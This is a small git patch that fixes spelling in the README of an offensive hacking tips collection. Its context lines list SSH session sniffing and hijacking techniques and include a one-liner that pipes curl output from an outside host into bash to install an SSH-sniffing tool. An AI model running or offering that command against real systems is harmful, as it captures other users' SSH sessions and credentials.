From 180b8650ce39ee607956952867fb1fb73ff02aa5 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 10 Nov 2023 10:10:44 +0000 Subject: [PATCH] Update README.md --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 43d2666..c636be4 100644 --- a/README.md +++ b/README.md @@ -84,13 +84,13 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [cryptsetup](#crypto-filesystem) 1. [EncFS](#encfs) 1. [Encrypting a file](#encrypting-file) -1. [SSH session sniffing and hijaking](#ssh-sniffing) +1. [SSH session sniffing and hijacking](#ssh-sniffing) 1. [Sniff a user's SHELL session with script](#ssh-sniffing-script) 2. [Sniff all SHELL sessions with dtrace](#dtrace) 1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace) 1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper) 1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit) - 1. [Hijak / Take-over a running SSH session](#hijak) + 1. [Hijack / Take-over a running SSH session](#hijack) 1. [VPN and Shells](#vpn-shell) 1. [Disposable Root Servers](#shell) 1. [VPN/VPS Providers](#vpn) @@ -1779,8 +1779,8 @@ The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-i bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" ``` - -**9.vi Hijak / Take-over a running SSH session** + +**9.vi Hijack / Take-over a running SSH session** Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session: ```sh